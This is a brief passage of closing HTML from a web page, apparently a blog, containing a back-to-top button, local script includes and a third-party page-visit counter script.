fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js?v=5.6.0"></script><script src="/js/main.js?v=5.6.0"></script><div class="js-pjax"></div><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></body></html>